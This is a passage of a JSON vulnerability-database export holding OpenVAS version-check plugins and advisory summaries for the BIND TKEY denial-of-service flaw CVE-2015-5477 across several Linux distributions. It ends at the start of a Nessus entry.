exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.10.2~4.P3.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-31T18:37:57", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-08-04T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for bind (openSUSE-SU-2015:1335-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850667", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850667", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850667\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-08-04 06:27:31 +0200 (Tue, 04 Aug 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for bind (openSUSE-SU-2015:1335-1)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"bind was updated to fix one security issue.\n\n This security issue was fixed:\n\n - CVE-2015-5477: Remote DoS via TKEY queries (boo#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\");\n\n script_tag(name:\"affected\", value:\"bind on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2015:1335-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debugsource\", rpm:\"bind-debugsource~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo\", rpm:\"bind-libs-debuginfo~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-lwresd\", rpm:\"bind-lwresd~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-lwresd-debuginfo\", rpm:\"bind-lwresd-debuginfo~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils-debuginfo\", rpm:\"bind-utils-debuginfo~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-32bit\", rpm:\"bind-libs-32bit~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo-32bit\", rpm:\"bind-libs-debuginfo-32bit~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ind-doc\", rpm:\"ind-doc~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:37:08", "description": "Oracle Linux Local Security Checks ELSA-2015-1514", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1514", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123049", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123049", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1514.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123049\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:58:42 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1514\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1514 - bind security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1514\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1514.html\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.6~25.P1.el5_11.3\", 
rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-07-30T00:00:00", "type": "openvas", "title": "Ubuntu Update for bind9 USN-2693-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477", "CVE-2012-5689"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842391", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842391", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for bind9 USN-2693-1\n#\n# Authors:\n# 
System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842391\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-30 05:14:24 +0200 (Thu, 30 Jul 2015)\");\n script_cve_id(\"CVE-2015-5477\", \"CVE-2012-5689\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for bind9 USN-2693-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind9'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Jonathan Foote discovered that Bind\nincorrectly handled certain TKEY queries. A remote attacker could use this issue\nwith a specially crafted packet to cause Bind to crash, resulting in a denial of\nservice. 
(CVE-2015-5477)\n\nPories Ediansyah discovered that Bind incorrectly handled certain\nconfigurations involving DNS64. A remote attacker could use this issue with\na specially crafted query to cause Bind to crash, resulting in a denial of\nservice. This issue only affected Ubuntu 12.04 LTS. (CVE-2012-5689)\");\n script_tag(name:\"affected\", value:\"bind9 on Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2693-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2693-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bind9\", ver:\"1:9.9.5.dfsg-3ubuntu0.4\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bind9\", ver:\"1:9.8.1.dfsg.P1-4ubuntu0.12\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-08-01T00:00:00", "type": "openvas", "title": "Fedora Update for bind FEDORA-2015-12357", "bulletinFamily": "scanner", "cvss2": {}, 
"cvelist": ["CVE-2015-5477", "CVE-2015-4620", "CVE-2015-1349", "CVE-2014-8500"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869830", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869830", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind FEDORA-2015-12357\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869830\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-01 06:54:29 +0200 (Sat, 01 Aug 2015)\");\n script_cve_id(\"CVE-2015-5477\", \"CVE-2015-4620\", \"CVE-2015-1349\", \"CVE-2014-8500\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for bind FEDORA-2015-12357\");\n script_tag(name:\"summary\", value:\"The remote host is missing an 
update for the 'bind'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bind on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-12357\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163007.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.6~10.P1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:22", "description": "Gentoo Linux Local Security Checks GLSA 201510-01", "cvss3": {}, "published": "2015-10-19T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201510-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477", "CVE-2015-4620", "CVE-2015-5722", "CVE-2015-1349", "CVE-2015-5986"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121414", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121414", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201510-01.nasl 12128 2018-10-26 
13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121414\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-19 07:03:58 +0300 (Mon, 19 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201510-01\");\n script_tag(name:\"insight\", value:\"A vulnerability has been discovered in BINDs named utility leading to a Denial of Service condition.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201510-01\");\n script_cve_id(\"CVE-2015-1349\", \"CVE-2015-4620\", \"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-5986\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", 
value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201510-01\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-dns/bind\", unaffected: make_list(\"ge 9.10.2_p4\"), vulnerable: make_list(\"lt 9.10.2_p4\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-27T18:38:41", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for bind (EulerOS-SA-2019-1433)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1286", "CVE-2015-5477", "CVE-2015-4620", "CVE-2015-8000", "CVE-2016-8864", "CVE-2016-2775", "CVE-2015-5722", "CVE-2016-1285", "CVE-2018-5740", "CVE-2017-3136", "CVE-2016-9131", "CVE-2016-2776", "CVE-2017-3145", "CVE-2014-0591", "CVE-2015-1349", "CVE-2014-8500", "CVE-2017-3142", "CVE-2017-3143"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191433", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191433", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 
2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1433\");\n script_version(\"2020-01-23T11:45:55+0000\");\n script_cve_id(\"CVE-2014-0591\", \"CVE-2014-8500\", \"CVE-2015-1349\", \"CVE-2015-4620\", \"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-8000\", \"CVE-2016-1285\", \"CVE-2016-1286\", \"CVE-2016-2775\", \"CVE-2016-2776\", \"CVE-2016-8864\", \"CVE-2016-9131\", \"CVE-2017-3136\", \"CVE-2017-3142\", \"CVE-2017-3143\", \"CVE-2017-3145\", \"CVE-2018-5740\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:45:55 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:45:55 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for bind (EulerOS-SA-2019-1433)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1433\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1433\");\n\n script_tag(name:\"summary\", 
value:\"The remote host is missing an update for the Huawei EulerOS\n 'bind' package(s) announced via the EulerOS-SA-2019-1433 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A denial of service flaw was found in the way BIND constructed a response to a query that met certain criteria. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request packet.(CVE-2016-2776)\n\nA denial of service flaw was found in the way BIND processed certain control channel input. A remote attacker able to send a malformed packet to the control channel could use this flaw to cause named to crash.(CVE-2016-1285)\n\nA flaw was found in the way BIND performed DNSSEC validation. An attacker able to make BIND (functioning as a DNS resolver with DNSSEC validation enabled) resolve a name in an attacker-controlled domain could cause named to exit unexpectedly with an assertion failure.(CVE-2015-4620)\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet.(CVE-2015-5477)\n\nA denial of service flaw was found in the way BIND handled queries for NSEC3-signed zones. A remote attacker could use this flaw against an authoritative name server that served NCES3-signed zones by sending a specially crafted query, which, when processed, would cause named to crash.(CVE-2014-0591)\n\nA denial of service flaw was found in the way BIND parsed certain malformed DNSSEC keys. 
A remote attacker could use this flaw to send a specially crafted DNS query (for example, a query requiring a response from a zone containing a deliberately malformed key) that would cause named functioning as a validating resolver to crash.(CVE-2015-5722)\n\nIt was found that the lightweight resolver protocol implementation in BIND could enter an infinite recursion and crash when asked to resolve a query name which, when combined with a search list entry, exceeds the maximum allowable length. A remote attacker could use this flaw to crash lwresd or named when using the 'lwres' statement in named.conf.(CVE-2016-2775)\n\nA denial of service flaw was found in the way BIND processed certain records with malformed class attributes. A remote attacker could use this flaw to send a query to request a cached record with a malformed class attribute that would cause named functioning as an authoritative or recursive server to crash. Note: This issue affects authoritative servers as well as recursive servers, however authoritative servers are at limited risk if they perform authentication when making recursive queries to resolve addresses for servers ...\n\n Description truncated. 
Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'bind' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.4~61.1.h2\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-lite\", rpm:\"bind-libs-lite~9.9.4~61.1.h2\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-license\", rpm:\"bind-license~9.9.4~61.1.h2\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.4~61.1.h2\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2022-03-27T14:42:56", "description": "According to its self-reported version number, the remote Juniper Junos device is affected by a denial of service vulnerability due to a flaw in ISC BIND when handling queries for TKEY records. 
